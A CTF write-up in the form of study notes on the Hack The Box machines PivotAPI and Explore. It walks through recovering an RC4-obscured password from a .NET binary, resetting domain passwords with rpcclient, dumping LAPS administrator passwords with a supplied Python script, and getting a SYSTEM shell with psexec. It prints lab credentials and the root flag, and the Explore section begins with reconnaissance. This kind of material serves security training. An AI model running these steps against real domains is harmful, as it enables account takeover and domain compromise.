---- ------------- ------ ----
d----- 8/8/2020 7:26 PM Jari
d----- 8/8/2020 7:23 PM Superfume
*Evil-WinRM* PS C:\Developers> cd Jari
*Evil-WinRM* PS C:\Developers\Jari> dir
Directorio: C:\Developers\Jari
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/8/2020 7:26 PM 3676 program.cs
-a---- 8/8/2020 7:18 PM 7168 restart-mssql.exe
*Evil-WinRM* PS C:\Developers\Jari> download program.cs
Info: Downloading C:\Developers\Jari\program.cs to program.cs
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> download restart-mssql.exe
Info: Downloading C:\Developers\Jari\restart-mssql.exe to restart-mssql.exe
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> cd ..
*Evil-WinRM* PS C:\Developers> cd Superfume
*Evil-WinRM* PS C:\Developers\Superfume> dir
*Evil-WinRM* PS C:\Developers\Superfume>
Two files downloaded.
Analyzing the second program
Looking at the .cs source, it appears to be the source code of the other program.
Check the executable's exact type:
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/Developers]
└─# file restart-mssql.exe
restart-mssql.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections
The program is .NET based and its name resembles the first program's, so it probably leaks credentials the same way, but it has to be reversed first. Searching for .NET reversing tools:
I settled on using dnSpy in a VM:
Code audit reveals leaked credentials
Auditing the decompiled code side by side with the source:
Decompiled:
// restart_oracle.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002048 File Offset: 0x00000248
private static void Main()
{
string value = "\r\n ____ __ __ __\r\n / __ \\___ _____/ /_____ ______/ /_ ____ ___ ______________ _/ /\r\n / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/ / __ `__ \\/ ___/ ___/ __ `/ / \r\n / _, _/ __(__ ) /_/ /_/ / / / /_ / / / / / (__ |__ ) /_/ / / \r\n/_/ |_|\\___/____/\\__/\\__,_/_/ \\__/ /_/ /_/ /_/____/____/\\__, /_/ \r\n /_/ \r\n by @HelpDesk 2020\r\n\r\n";
byte[] bytes = Encoding.ASCII.GetBytes("CR_is_a_crybaby");
byte[] data = new byte[]
{
66,
180,
137,
236,
54,
46,
36,
97,
214,
48,
90,
72,
24,
83
};
byte[] array = Program.RC4.Decrypt(bytes, data);
Console.WriteLine(value);
Thread.Sleep(5000);
Process process = new Process();
SecureString secureString = new SecureString();
process.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
process.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.UserName = "Jari";
string text = "";
for (int i = 0; i < text.Length; i++)
{
secureString.AppendChar(text[i]);
}
process.StartInfo.Password = secureString;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
}
Source:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;
namespace restart_oracle
{
class Program
{
public class RC4
{
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
public static byte[] StringToByteArray(String hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
}
static void Main()
{
string banner = @"
____ __ __ __
/ __ \___ _____/ /_____ ______/ /_ ____ ___ ______________ _/ /
/ /_/ / _ \/ ___/ __/ __ `/ ___/ __/ / __ `__ \/ ___/ ___/ __ `/ /
/ _, _/ __(__ ) /_/ /_/ / / / /_ / / / / / (__ |__ ) /_/ / /
/_/ |_|\___/____/\__/\__,_/_/ \__/ /_/ /_/ /_/____/____/\__, /_/
/_/
by @HelpDesk 2020
";
byte[] key = Encoding.ASCII.GetBytes("");
byte[] password_cipher = { };
byte[] resultado = RC4.Decrypt(key, password_cipher);
Console.WriteLine(banner);
Thread.Sleep(5000);
System.Diagnostics.Process psi = new System.Diagnostics.Process();
System.Security.SecureString ssPwd = new System.Security.SecureString();
psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
psi.StartInfo.RedirectStandardOutput = true;
psi.StartInfo.UseShellExecute = false;
psi.StartInfo.UserName = "Jari";
string password = "";
for (int x = 0; x < password.Length; x++)
{
ssPwd.AppendChar(password[x]);
}
password = "";
psi.StartInfo.Password = ssPwd;
psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
psi.Start();
}
}
}
Code audit analysis:
Credentials often end up near console output, so set a breakpoint on Console.WriteLine(value); and inspect memory at that point: the byte array returned by Program.RC4.Decrypt just before it holds the decrypted password (the source calls the input password_cipher). We do find the leaked password there, and since the source sets psi.StartInfo.UserName = "Jari"; and the files live in Jari's directory, the password belongs to Jari:
So record the new credential Jari:Cos@Chung@!RPG in our notes file.
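Added example, not code from the page or from the box author: instead of breaking at Console.WriteLine in dnSpy, the password can be recovered statically, because the decompiled Main() embeds both the RC4 key ("CR_is_a_crybaby") and the 14-byte ciphertext, and Program.RC4 in program.cs is plain RC4 (decryption is the same operation as encryption). The block ports that routine to Python and decrypts the embedded literals. The one assumption is that the decrypted bytes are the password handed to ProcessStartInfo, which the memory inspection above bears out.

```python
# Added example (not the page's or the box author's code): statically recover the
# password restart-mssql.exe passes to ProcessStartInfo. KEY and CIPHERTEXT are the
# literals from the decompiled Main(); rc4() is a port of Program.RC4 in program.cs.

KEY = b"CR_is_a_crybaby"
CIPHERTEXT = bytes([66, 180, 137, 236, 54, 46, 36, 97, 214, 48, 90, 72, 24, 83])


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA + PRGA), same algorithm as Program.RC4.Encrypt/Decrypt."""
    if not key:
        raise ValueError("empty key")
    box = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:                         # pseudo-random generation, XOR keystream
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        k = box[(box[a] + box[j]) % 256]
        out.append(byte ^ k)
    return bytes(out)


def recover_password(key: bytes = KEY, ciphertext: bytes = CIPHERTEXT) -> str:
    """Decrypt the embedded blob; RC4 is symmetric, so decrypt == encrypt.
    Assumption: the plaintext is the password the binary appends to the SecureString."""
    return rc4(key, ciphertext).decode("ascii")


if __name__ == "__main__":
    print(f"Jari:{recover_password()}")
```

Because the key and ciphertext sit next to each other in the assembly, the "encryption" only obscures the string from a casual `strings` run; anyone with the binary can reproduce this in seconds, which is the lesson for developers who embed service-account credentials this way.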
This credential still fails over SSH, but evil-winrm works. This time, though, let's look for other exposed APIs we could use, because WinRM over the proxy is too unstable. Re-reading tcpdetails.nmap shows there is also an msrpc service to try:
This target sits in a domain: once we have one shell we move laterally to the next and keep hopping between accounts, which is pivoting, and since more than one API is exposed for us to connect to, I think that is where the challenge name PivotAPI comes from.
pivot by msrpc
Before that, look at Jari's user properties in BloodHound:
Under Outbound Object Control this user can force a password change on two other users.
Now connect over msrpc in a new window. rpcclient has many uses; here we use it to change a password (setuserinfo2 with information level 23 sets a new password on the SAMR user object):
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'Jari%Cos@Chung@!RPG' 10.129.228.115
rpcclient $> setuserinfo2 help
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 gibdeon 23 'cvestone!666'
rpcclient $>
Verify that the change took effect with crackmapexec:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.228.115 -u gibdeon -p 'cvestone!666'
SMB 10.129.228.115 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.115 445 PIVOTAPI [+] LicorDeBellota.htb\gibdeon:cvestone!666
The + means it succeeded.
BloodHound helps find more attack paths in the domain
Look at gibdeon's user properties next:
Under First Degree Group Memberships this user is in Domain Users and Account Operators.
Look at the Domain Users group:
It has no outbound objects it controls directly:
The Account Operators group, on the other hand, directly controls many objects:
This domain is complex enough to make the object count dizzying, but keep the end goal in mind: take the domain administrator. So use BloodHound again to find the shortest path to Domain Admins:
For example, starting from the targets we already own (marked with 💀️), it shows that PSRemote is one avenue to try.
Using LAPS to obtain the domain administrator credentials
First go back to the stable SSH session we already have and look at the domain groups:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups /domain
Group Accounts for \\PIVOTAPI
-------------------------------------------------------------------------------
*Key Administrators
*Organization Key Administrators
*Enterprise Administrators
*Schema Administrators
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Read-only Domain Controllers
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.
LAPS ADM and LAPS READ are the groups we are most interested in.
Both are relevant to privilege escalation. LAPS stands for Local Administrator Password Solution, Microsoft's tool for automatically managing and rotating the local administrator password of domain-joined computers; the password is stored in the computer object's ms-Mcs-AdmPwd attribute, and these two groups control who may access it.
LAPS ADM is typically granted the right to manage the password: its members can force a rotation (by writing the expiration time) as well as read the current value.
LAPS READ is typically granted read-only access: its members can read the local administrator password but not change or reset it, which suits security teams or other roles that need to monitor or audit it.
Since this machine is a domain controller there is no separate local account: the LAPS-managed password is that of the domain's built-in Administrator, so getting into LAPS READ is equivalent to domain administrator access. Check the members of both groups:
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS READ" /domain
Group Name LAPS READ
Comment
Members
-------------------------------------------------------------------------------
cybervaca lothbrok
The command completed successfully.
licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS ADM" /domain
Group Name LAPS ADM
Comment
Members
-------------------------------------------------------------------------------
cybervaca
The command completed successfully.
So cybervaca holds the highest privileges across the two groups. Going back to the Account Operators outbound control graph in BloodHound, we find it has full control over lothbrok but not over cybervaca, so we can reset lothbrok's password through gibdeon. This path is easier than the others, so try it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'gibdeon%cvestone!666' 10.129.229.178
rpcclient $> setuserinfo2 lothbrok 23 'cvestone.com666'
rpcclient $>
With lothbrok taken, we can read the LAPS password with a tool; a search turns up the following:
Run the script:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 dump_laps.py -u lothbrok -p cvestone.com666 -d LicorDebellota.htb -l 10.129.229.178
LAPS Dumper - Running at 02-10-2024 20:29:27
PIVOTAPI 2UF4969F52FbRvF2tap0
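Added example, written for this walkthrough and not the dump_laps.py used above: the same LDAP read performed as a LAPS READ member, built on the ldap3 library (assumed installed), plus a FILETIME decoder for the expiry attribute so the output also tells you when the password will rotate. The constructed SAMPLE_ENTRY reuses the host and password from the dump above so the parsing can be checked offline; the DC host argument, the ldap3 calls and the bind format are the assumptions.

```python
# Added example (not the page's dump_laps.py): read LAPS-managed passwords over LDAP
# as a LAPS READ member and decode the rotation deadline. ms-Mcs-AdmPwd and
# ms-Mcs-AdmPwdExpirationTime are the legacy LAPS schema attributes.
from datetime import datetime, timedelta, timezone
from typing import List

LAPS_FILTER = "(&(objectCategory=computer)(ms-Mcs-AdmPwd=*))"
LAPS_ATTRS = ["dNSHostName", "ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample of one LDAP result's attributes, using the host and password
# from the dump above; the expiry value is an assumed FILETIME for 2021-03-12 UTC.
SAMPLE_ENTRY = {
    "dNSHostName": ["PIVOTAPI.LicorDeBellota.htb"],
    "ms-Mcs-AdmPwd": ["2UF4969F52FbRvF2tap0"],
    "ms-Mcs-AdmPwdExpirationTime": ["132599808000000000"],
}


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME is 100-ns ticks since 1601-01-01 UTC; convert to an aware datetime."""
    return _EPOCH_1601 + timedelta(microseconds=filetime // 10)


def parse_laps_entry(attrs: dict) -> dict:
    """Normalise one result's attributes (single values or lists) into host/password/expiry."""
    def first(value):
        return value[0] if isinstance(value, list) else value

    raw_exp = first(attrs.get("ms-Mcs-AdmPwdExpirationTime", 0)) or 0
    expiry = int(raw_exp)
    return {
        "host": first(attrs["dNSHostName"]),
        "password": first(attrs["ms-Mcs-AdmPwd"]),
        "expires": filetime_to_datetime(expiry) if expiry else None,
    }


def dump_laps(dc: str, user: str, password: str, domain: str) -> List[dict]:
    """Bind with NTLM as a LAPS READ member and return every readable LAPS password."""
    # Imported here so the helpers above run even where ldap3 is not installed.
    from ldap3 import ALL, NTLM, Connection, Server

    base_dn = ",".join(f"DC={part}" for part in domain.split("."))
    conn = Connection(Server(dc, get_info=ALL), user=f"{domain}\\{user}",
                      password=password, authentication=NTLM, auto_bind=True)
    conn.search(base_dn, LAPS_FILTER, attributes=LAPS_ATTRS)
    return [parse_laps_entry(entry["attributes"])
            for entry in conn.response if entry.get("type") == "searchResEntry"]


if __name__ == "__main__":
    # e.g. dump_laps("10.129.229.178", "lothbrok", "cvestone.com666", "LicorDeBellota.htb")
    for row in dump_laps(*__import__("sys").argv[1:5]):
        print(row["host"], row["password"], row["expires"])
```

The filter only returns computers whose ms-Mcs-AdmPwd the bound account is allowed to read, so an empty result from a low-privileged user is the expected outcome; seeing the DC's password in clear text is exactly why LAPS READ membership must be treated as sensitive as the administrator password itself.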
We now hold the domain administrator's password; verify it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.229.178 -u Administrador -p '2UF4969F52FbRvF2tap0'
SMB 10.129.229.178 445 PIVOTAPI [*] Windows 10.0 Build 17763 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.178 445 PIVOTAPI [+] LicorDeBellota.htb\Administrador:2UF4969F52FbRvF2tap0 (Pwn3d!)
The Pwn3d! marker confirms we really own this machine.
Note: the machine's language is not English, so the administrator account is named differently (Administrador rather than Administrator); net user shows the actual name.
The question now is how to get a shell as the domain administrator. First check in BloodHound whether the service groups seen earlier contain the domain administrator:
Clearly none of them does.
Using psexec to get a domain administrator shell
In that case we can still try psexec from the impacket suite:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Administrador:'2UF4969F52FbRvF2tap0'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[*] Found writable share ADMIN$
[*] Uploading file TweoOztV.exe
[*] Opening SVCManager on 10.129.229.178.....
[*] Creating service glyR on 10.129.229.178.....
[*] Starting service glyR.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Versión 10.0.17763.1879]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
Since this gives us a shell, why didn't we consider it earlier? Because psexec needs write access to an administrative share (ADMIN$ or C$) to upload its service binary, and the earlier users lacked that, so it is normally not the first connection method to try:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Jari:'Cos@Chung@!RPG'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py 3v4Si0N:'Gu4nCh3C4NaRi0N!23'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
However, the final flag is in neither the domain administrator's home directory nor the desktop:
C:\Windows\system32> cd c:\users\Administrador
c:\Users\administrador> cd Desktop
c:\Users\administrador\Desktop> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El número de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\administrador\Desktop
28/04/2021 22:36 <DIR> .
28/04/2021 22:36 <DIR> ..
0 archivos 0 bytes
2 dirs 4.520.017.920 bytes libres
c:\Users\administrador\Desktop> cd ..
c:\Users\administrador> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El número de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\administrador
11/08/2020 16:32 <DIR> .
11/08/2020 16:32 <DIR> ..
09/08/2020 16:06 <DIR> 3D Objects
09/08/2020 16:06 <DIR> Contacts
28/04/2021 22:36 <DIR> Desktop
09/08/2020 16:06 <DIR> Documents
10/08/2020 17:21 <DIR> Downloads
09/08/2020 16:06 <DIR> Favorites
09/08/2020 16:06 <DIR> Links
09/08/2020 16:06 <DIR> Music
09/08/2020 16:06 <DIR> Pictures
09/08/2020 16:06 <DIR> Saved Games
09/08/2020 16:06 <DIR> Searches
09/08/2020 16:06 <DIR> Videos
0 archivos 0 bytes
14 dirs 4.520.017.920 bytes libres
But recall that in the LAPS groups the user cybervaca is about as privileged as the administrator, so try that user, who also happens to be the author of this machine ^w^
c:\Users\administrador> cd ..\cybervaca\Desktop
c:\Users\cybervaca\Desktop> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El número de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\cybervaca\Desktop
30/04/2021 09:31 <DIR> .
30/04/2021 09:31 <DIR> ..
10/02/2024 13:19 34 root.txt
1 archivos 34 bytes
2 dirs 4.520.226.816 bytes libres
c:\Users\cybervaca\Desktop>type root.txt
9f91a2b8bdfab265d51b101db6fe3dc8
So the final flag is 9f91a2b8bdfab265d51b101db6fe3dc8
Further experiments
(TODO)
Summary
(to be written during review)
Explore
"Red Team Notes" study log
Machine introduction
Explore is an easy difficulty Android machine. Network enumeration reveals a vulnerable service that is exploitable via a Metasploit module, and gives restricted read access to the machine. Further enumeration of the files, reveals the SSH credentials of a system user, allowing this way remote access to the machine. Finally, the attacker is able to forward a filtered port locally using SSH tunneling, in order to access the Android shell over the Android Debug Bridge (ADB). This eventuality allows the attacker to execute commands as the root user.
Difficulty
Easy
Reconnaissance
Full TCP port scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 16:17 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 11.98% done; ETC: 16:18 (0:01:13 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 26.79% done; ETC: 16:18 (0:01:03 remaining)
Nmap scan report for 10.129.230.80 (10.129.230.80)
Host is up (0.19s latency).
All 65535 scanned ports on 10.129.230.80 (10.129.230.80) are in ignored states.
Not shown: 64652 filtered tcp ports (no-response), 883 closed tcp ports (conn-refused)
Nmap done: 1 IP address (1 host up) scanned in 87.29 seconds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --min-rate 10000 -p- 10.129.178.12 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:32 CST
Warning: 10.129.178.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.29s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
15262/tcp filtered unknown
30972/tcp filtered unknown
32708/tcp filtered unknown
33415/tcp filtered unknown
35169/tcp open unknown
42135/tcp open unknown
59777/tcp open unknown
62324/tcp filtered unknown
64451/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds
Here I tried both with -sT and without it; with -sT nothing came back, so nmap scanning is not mechanical and you have to try variants.
Extract the ports from the result so they are easy to reuse:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ports=$(grep /tcp nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# echo $ports
2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451
Detailed TCP scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT -sC -sV -O -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:50 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
5555/tcp filtered freeciv
15262/tcp closed unknown
30972/tcp closed unknown
32708/tcp closed unknown
33415/tcp closed unknown
35169/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
62324/tcp closed unknown
64451/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.94SVN%I=7%D=2/20%Time=65D44BD2%P=x86_64-pc-linux-gnu%r
SF:(NULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/20%OT=2222%CT=15262%CU=44075%PV=Y%DS=2%DC=I%G=Y%T
OS:M=65D44BEB%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=C)SEQ(SP=105%GCD=1%ISR=109%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST
OS:11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M53CST11NW6%O5=M53CST11NW6%O6=M5
OS:3CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%
OS:T=40%W=FFFF%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Device: phone
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds
UDP scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.178.12 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:24 CST
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:03 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:06 remaining)
Stats: 0:14:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.06% done; ETC: 14:43 (0:03:52 remaining)
Stats: 0:18:55 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.99% done; ETC: 14:43 (0:00:00 remaining)
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.28s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE
1900/udp open|filtered upnp
3130/udp open|filtered squid-ipc
5353/udp open|filtered zeroconf
6050/udp open|filtered x11
18985/udp open|filtered unknown
21948/udp open|filtered unknown
36458/udp open|filtered unknown
49306/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1150.51 seconds
Vulnerability script scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:42 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.37s latency).
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
15262/tcp closed unknown
30972/tcp closed unknown
32708/tcp closed unknown
33415/tcp closed unknown
35169/tcp closed unknown
42135/tcp open unknown
59777/tcp open unknown
62324/tcp closed unknown
64451/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
Scan result analysis
The nmap output says the device is probably a phone. Port 2222 runs an SSH server (the developer appears to be Banana Studio), port 42135 runs ES File Explorer, a very common Android app, and port 59777 is fingerprinted as a Minecraft JSONAPI (a misidentification: it is the HTTP service ES File Explorer opens, as the exploit below shows). No clear path yet, so search the unfamiliar names first:
The search clears things up
and confirms our guess.
Searching freeciv:
Freeciv uses this port for its multiplayer game server, but 5555 is also the usual port of the Android Debug Bridge (ADB), which is effectively a shell; since the port is filtered rather than closed, ADB is the more likely explanation.
Note: when searching, combine all the distinctive keywords you have; that makes the results far more precise.
Exploitation
Finding public exploits
Now look for public vulnerabilities in the attack surface we found, the applications exposed on those ports: first with searchsploit, then with a search engine or GitHub:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana studio
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Banana Dance - Cross-Site Scripting / SQL Injection | php/webapps/37646.txt
banana dance b.2.6 - Multiple Vulnerabilities | php/webapps/23573.txt
Banana Dance CMS and Wiki - SQL Injection | php/webapps/17919.txt
Bananadance Wiki b2.2 - Multiple Vulnerabilities | php/webapps/22654.txt
Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation | hardware/local/40271.txt
Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting | cfm/webapps/26882.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Obviously none of these match our situation; try the other program's name:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit ES File Explorer
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities | php/webapps/51615.txt
ES File Explorer 4.1.9.7.4 - Arbitrary File Read | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal | ios/remote/16278.py
